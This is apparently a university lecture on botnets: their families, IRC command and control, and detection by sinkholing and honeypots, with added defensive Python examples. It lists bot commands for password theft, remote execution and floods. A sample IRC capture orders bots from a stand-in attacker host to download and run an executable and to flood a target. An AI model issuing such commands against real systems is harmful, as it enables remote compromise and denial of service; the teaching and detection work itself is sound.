CIS3360: Security in Computing
Chapter 4.3: Botnets
Cliff Zou
Spring 2012
Acknowledgement
This lecture uses some contents from the lecture notes from:
• Dr. Dawn Song, CS161: Computer Security
• Richard Wang, SophosLabs: The Development of Botnets
• Randy Marchany, VA Tech IT Security Lab: Botnets
Botnets
• Collection of compromised hosts
  • Spread like worms and viruses
  • Once installed, respond to remote commands
• A network of ‘bots’
  • robot: an automatic machine that can be programmed to perform specific tasks
• Also known as ‘zombies’
• Platform for many attacks
  • Spam forwarding (70% of all spam?)
  • Click fraud
  • Keystroke logging
  • Distributed denial of service attacks
• Serious problem
  • Top concern of banks, online merchants
  • Vint Cerf: ¼ of hosts connected to Internet
What are botnets used for?
IRC (Internet Relay Chat) based Control
Why IRC?
• IRC servers are:
  • freely available
  • easy to manage
  • easy to subvert
• Attackers have experience with IRC
• IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts
How bad is the problem?
• Symantec identified a 400K node botnet
• A netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections. Phatbot harvests MyDoom- and Bagle-infected machines.
• Researchers at Gatech monitored thousands of botnets
Spreading Problem
• Spreading mechanism is a leading cause of background noise
  • Ports 445, 135, 139, 137 accounted for 80% of traffic captured by the German Honeynet Project
• Other ports
  • 2745 – Bagle backdoor
  • 3127 – MyDoom backdoor
  • 3410 – Optix trojan backdoor
  • 5000 – UPnP vulnerability
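As an added example (not code from the lecture), the script below does the kind of port breakdown the Honeynet figures above come from: it parses constructed honeynet flow records, computes the share of attempts that hit the four Windows spreading ports, and separately reports hits on the backdoor ports the slide lists. The port labels are the slide's; the flow records and their format are constructed for this illustration.

```python
"""Classify inbound connection attempts captured by a honeynet by destination port.

Added example, not from the lecture. The port-to-cause mapping is the one the slide
gives; the flow records are constructed for the illustration.
"""
from collections import Counter

# Ports the slide attributes to bot spreading (Windows RPC/SMB/NetBIOS).
SPREADING_PORTS = {445: "SMB", 135: "MS-RPC", 139: "NetBIOS session", 137: "NetBIOS name"}
# Backdoor ports left open by earlier worms; bots such as Phatbot harvest these hosts.
BACKDOOR_PORTS = {2745: "Bagle backdoor", 3127: "MyDoom backdoor",
                  3410: "Optix trojan backdoor", 5000: "UPnP vulnerability"}

# Constructed honeynet flow records: "<timestamp> <src_ip> <dst_ip> <proto> <dst_port>".
# One malformed line is included on purpose to show it is skipped, not counted.
SAMPLE_FLOWS = """\
2012-02-01T10:00:01 10.9.1.5 192.0.2.10 tcp 445
2012-02-01T10:00:02 10.9.1.5 192.0.2.11 tcp 445
2012-02-01T10:00:03 10.9.2.7 192.0.2.10 tcp 135
2012-02-01T10:00:04 10.9.2.7 192.0.2.12 tcp 139
2012-02-01T10:00:05 10.9.3.1 192.0.2.10 udp 137
2012-02-01T10:00:06 10.9.3.1 192.0.2.10 tcp 445
2012-02-01T10:00:07 10.9.4.9 192.0.2.13 tcp 3127
2012-02-01T10:00:08 10.9.4.9 192.0.2.13 tcp 2745
2012-02-01T10:00:09 10.9.5.2 192.0.2.10 tcp 135
2012-02-01T10:00:10 10.9.5.2 192.0.2.14 tcp 445
garbage line that should be skipped
"""


def parse_flows(text):
    """Yield (src_ip, dst_port) for each well-formed record; skip malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            port = int(parts[4])
        except ValueError:
            continue
        yield parts[1], port


def summarize(text):
    """Return the spreading-port share, top ports, and backdoor-port activity."""
    flows = list(parse_flows(text))
    by_port = Counter(port for _, port in flows)
    total = sum(by_port.values())
    spreading = sum(by_port[p] for p in SPREADING_PORTS)
    backdoor_hits = {p: by_port[p] for p in BACKDOOR_PORTS if by_port[p]}
    # Sources that probed a worm backdoor port: candidates for "harvesting" behaviour.
    harvesters = sorted({src for src, port in flows if port in BACKDOOR_PORTS})
    return {
        "total": total,
        "spreading_share": spreading / total if total else 0.0,
        "top_ports": by_port.most_common(3),
        "backdoor_hits": {f"{p} ({BACKDOOR_PORTS[p]})": n for p, n in backdoor_hits.items()},
        "harvesters": harvesters,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_FLOWS).items():
        print(f"{key}: {value}")
```

On the constructed sample, 8 of the 10 valid records land on the four spreading ports (a share of 0.8, the same proportion the slide quotes), and the single source that touched both the MyDoom and Bagle backdoor ports is reported as a harvester candidate.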
Most commonly used Bot families
• Agobot
• SDBot
• SpyBot
• GT Bot
Agobot
• Most sophisticated: 20,000 lines of C/C++ code
• IRC-based command/control
• Large collection of target exploits
• Capable of many DoS attack types
• Shell encoding/polymorphic obfuscation
• Traffic sniffers/key logging
• Defend/fortify compromised system
• Ability to frustrate disassembly
SDBot
• Simpler than Agobot: 2,000 lines of C code
• Non-malicious at base
• Utilizes IRC-based command/control
• Easily extended for malicious purposes
  • Scanning
  • DoS attacks
  • Sniffers
  • Information harvesting
  • Encryption
SpyBot
• <3,000 lines of C code
• Possibly evolved from SDBot
• Similar command/control engine
• No attempts to hide malicious purposes
GT Bot
• Functions based on mIRC scripting capabilities
• HideWindow program hides bot on local system
  • Basic rootkit function
• Port scanning, DoS attacks, exploits for RPC and NetBIOS
• Variance in codebase size, structure, complexity, implementation
• Convergence in set of functions
  • Possibility for defense systems effective across bot families
• Bot families extensible
  • Agobot likely to become dominant
Control
• All of the above use IRC for command/control
• Disrupt IRC, disable bots
  • Sniff IRC traffic for commands
  • Shut down channels used for botnets
  • IRC operators play central role in stopping botnet traffic
• But a botnet could use its own IRC server
  • Automated traffic identification required
• Future botnets may move away from IRC
  • Move to P2P communication
  • Traffic fingerprinting still useful for identification
Host control
• Fortify system against other malicious attacks
  • Disable anti-virus software
• Harvest sensitive information
  • PayPal, software keys, etc.
  • Economic incentives for botnets
• Stresses need to patch/protect systems prior to attack
• Stronger protection boundaries required across applications in OSes
Example Botnet Commands
• Connection
  CLIENT: PASS <password>
  HOST: (if error, disconnect)
  CLIENT: NICK <nick>
  HOST: NICKERROR | CONNECTED
• Pass hierarchy info
  BOTINFO <nick> <connected_to> <priority>
  BOTQUIT <nick>
Example Botnet Commands
• IRC Commands
  CHANJOIN <tag> <channel>
  CHANPART <tag> <channel>
  CHANOP <tag> <channel>
  CHANKICK <tag> <channel>
  CHANBANNED <tag> <channel>
  CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>
Example Botnet Commands
• pstore: display all usernames/passwords stored in browsers of infected systems
• bot.execute: run executable on remote system
• bot.open: read file on remote computer
• bot.command: run command with system()
Example Botnet Commands
• http.execute: download and execute file through HTTP
• ftp.execute
• ddos.udpflood, ddos.synflood, ddos.phaticmp
• redirect.http, redirect.socks
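The Control slide's first defense is "sniff IRC traffic for commands", and the command slides above give the vocabulary to look for. The detector below is an added example (not lecture code and not any bot's or IRC server's code): it parses captured IRC lines in the standard PRIVMSG form, flags messages whose first word is one of the command tokens listed on the slides, and notes the PASS-then-NICK login order the connection slide shows. The captured sessions, the nick and channel names, and the verdict thresholds are constructed assumptions of this example.

```python
"""Flag botnet command-and-control traffic in captured IRC lines.

Added example, not from the lecture. The command vocabulary is the one the slides
list (BOTINFO, CHANJOIN, bot.execute, ddos.*, http.execute, ...); the captured
sessions below are constructed and use documentation addresses only.
"""
import re

# Command tokens taken from the lecture slides (Agobot-style); anything else is ignored.
BOT_COMMANDS = {
    "BOTINFO", "BOTQUIT", "CHANJOIN", "CHANPART", "CHANOP", "CHANKICK", "CHANBANNED",
    "CHANPRIORITY", "pstore", "bot.execute", "bot.open", "bot.command",
    "http.execute", "ftp.execute", "ddos.udpflood", "ddos.synflood", "ddos.phaticmp",
    "redirect.http", "redirect.socks",
}
# High-impact commands: a single sighting is enough to call the channel a C&C channel.
CRITICAL = {c for c in BOT_COMMANDS if c.startswith(("ddos.", "bot.", "http.", "ftp."))} | {"pstore"}

# RFC 1459 message from a user: ":<nick>!<user>@<host> PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$")

# Constructed capture of a bot client logging in and a controller issuing commands.
SAMPLE_CAPTURE = """\
PASS s3cret
NICK [USA|XP]-0042
JOIN #bots
:owner!op@evil.example PRIVMSG #bots :.CHANJOIN 1 #backup
:owner!op@evil.example PRIVMSG #bots :.http.execute http://198.51.100.7/update.exe
:alice!u@chat.example PRIVMSG #bots :hello everyone
:owner!op@evil.example PRIVMSG #bots :.ddos.udpflood 203.0.113.9 80 60
"""

# Constructed capture of an ordinary chat session, for contrast.
BENIGN_CAPTURE = """\
NICK alice
:bob!u@chat.example PRIVMSG #linux :anyone tried the new kernel?
:alice!u@chat.example PRIVMSG #linux :yes, works fine
"""


def parse_line(line):
    """Return ('privmsg', nick, target, text), ('client', verb, arg), or None."""
    line = line.rstrip("\r\n")
    m = PRIVMSG_RE.match(line)
    if m:
        return ("privmsg", m.group("nick"), m.group("target"), m.group("text"))
    parts = line.split(None, 1)
    if parts and parts[0] in ("PASS", "NICK", "JOIN"):
        return ("client", parts[0], parts[1] if len(parts) > 1 else "")
    return None


def command_token(text):
    """First word of a message, minus the '.' or '!' prefix bots commonly use."""
    words = text.split()
    return words[0].lstrip(".!") if words else ""


def analyze(capture):
    """Score one captured session and return the verdict with its evidence."""
    verbs = []
    sightings = []  # (nick, target, command)
    for raw in capture.splitlines():
        parsed = parse_line(raw)
        if not parsed:
            continue
        if parsed[0] == "client":
            verbs.append(parsed[1])
        else:
            _, nick, target, text = parsed
            tok = command_token(text)
            if tok in BOT_COMMANDS:
                sightings.append((nick, target, tok))
    # PASS before NICK is the login order the connection slide shows for bots.
    # Regular clients may send PASS too, so on its own this is only a weak signal.
    pass_then_nick = ("PASS" in verbs and "NICK" in verbs
                      and verbs.index("PASS") < verbs.index("NICK"))
    critical = sorted({c for _, _, c in sightings if c in CRITICAL})
    if critical or len(sightings) >= 3:
        verdict = "botnet-c2"
    elif sightings or pass_then_nick:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "pass_then_nick": pass_then_nick,
            "commands": sightings, "critical": critical,
            "controllers": sorted({n for n, _, _ in sightings})}


if __name__ == "__main__":
    print(analyze(SAMPLE_CAPTURE))
    print(analyze(BENIGN_CAPTURE))
```

Matching on the first word keeps the detector cheap enough to run inline on a sniffer feed, and recording who issued each command gives the IRC operator the nick to act on when shutting the channel down. A botnet running on its own IRC server (the slide's caveat) would need the same logic applied to traffic fingerprinted as IRC on arbitrary ports rather than only on 6667.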
Current Botnet Control Architecture
[Figure: a botmaster controls several C&C servers, each of which controls a set of bots]
• More than one C&C server
• Spread all around the world
Botnet Monitor: Gatech KarstNet
• Many bots use a Dyn-DNS name to find C&C
[Figure: bots resolve cc1.com to reach the attacker's C&C servers; after the DNS hijack they connect to the KarstNet sinkhole instead]
• Detect cc1.com by its abnormal DNS queries
• KarstNet informs the DNS provider of cc1.com
• DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
• All/most bots attempt to connect to the sinkhole
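The slide says only that cc1.com is detected by its "abnormal DNS queries". The script below is an added example, not KarstNet's code: it reads a constructed resolver log, treats a name as abnormal when its query count stands far above the other names the same provider serves and the queries come from many distinct hosts (a leave-one-out z-score threshold, which is an assumption of this example rather than KarstNet's statistic), and then emits the A record a cooperating DNS provider would publish to point the name at the sinkhole. The log, the client addresses, the sinkhole address and the thresholds are all constructed; cc1.com is the slide's placeholder name.

```python
"""Spot a dynamic-DNS name that is being resolved like a botnet rendezvous point.

Added example, not KarstNet's code. "Abnormal" here means the name's query count is a
z-score outlier against the other names in the same log and the queries come from
many distinct clients; both the rule and the log are assumptions of this example.
"""
from collections import defaultdict
from statistics import mean, pstdev


def _build_sample_log():
    """Constructed resolver log, one line per query: "<timestamp> <client_ip> <qname>"."""
    lines = []
    # Seven ordinary names, each resolved a few times by a couple of office hosts.
    ordinary = [("www.example.com", 3), ("mail.example.com", 2), ("cdn.example.net", 4),
                ("blog.example.org", 3), ("home.example.net", 2), ("ftp.example.com", 3),
                ("wiki.example.org", 4)]
    for name, n in ordinary:
        for i in range(n):
            lines.append(f"2012-02-01T10:{i:02d}:00 10.0.0.{i + 1} {name}")
    # The rendezvous name (slide's placeholder): 20 different hosts, all within one hour.
    for i in range(20):
        lines.append(f"2012-02-01T10:{i:02d}:30 198.51.100.{i + 1} cc1.com")
    return "\n".join(lines)


SAMPLE_QUERY_LOG = _build_sample_log()


def load_queries(text):
    """Map each queried name to the list of client IPs that asked for it."""
    per_name = defaultdict(list)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed records rather than miscount
        per_name[parts[2].lower().rstrip(".")].append(parts[1])
    return per_name


def zscore(value, others):
    """How many standard deviations `value` sits above the population `others`."""
    if len(others) < 2:
        return 0.0
    sd = pstdev(others)
    return 0.0 if sd == 0 else (value - mean(others)) / sd


def find_rendezvous_names(text, threshold=3.0, min_clients=5):
    """Return the names whose query volume and client spread look like C&C lookups."""
    per_name = load_queries(text)
    counts = {name: len(clients) for name, clients in per_name.items()}
    flagged = []
    for name, n in counts.items():
        # Leave the candidate out of its own baseline so it cannot mask itself.
        others = [v for k, v in counts.items() if k != name]
        z = zscore(n, others)
        clients = len(set(per_name[name]))
        if z >= threshold and clients >= min_clients:
            flagged.append({"qname": name, "queries": n,
                            "distinct_clients": clients, "zscore": round(z, 2)})
    return sorted(flagged, key=lambda f: -f["queries"])


def sinkhole_records(flagged, sinkhole_ip="192.0.2.53", ttl=60):
    """Zone lines a cooperating DNS provider would publish to redirect the flagged names."""
    return [f"{f['qname']}. {ttl} IN A {sinkhole_ip}" for f in flagged]


if __name__ == "__main__":
    hits = find_rendezvous_names(SAMPLE_QUERY_LOG)
    for hit in hits:
        print(hit)
    print("\n".join(sinkhole_records(hits)))
```

The distinct-client requirement is what separates a rendezvous name from a single busy host hammering its own resolver, and the short TTL on the sinkhole record lets the provider undo the redirect quickly if the name turns out to be legitimate. Once the record is live, every bot that resolves the name lands on the sinkhole, which is where the slide's "all/most bots attempt to connect" count comes from.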
Botnet Monitor: Honeypot Spy
• Security researchers set up honeypots
  • Honeypots: deliberately set up vulnerable machines
  • When compromised, put close monitoring on the malware’s behaviors
  • Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
• When a compromised honeypot joins a botnet
  • Passive monitoring: log all network traffic
  • Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional C&C, etc.)
• Representative research paper: A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), 2006.
The Future Generation of Botnets
• Peer-to-Peer C&C
• Polymorphism
• Anti-honeypot
• Rootkit techniques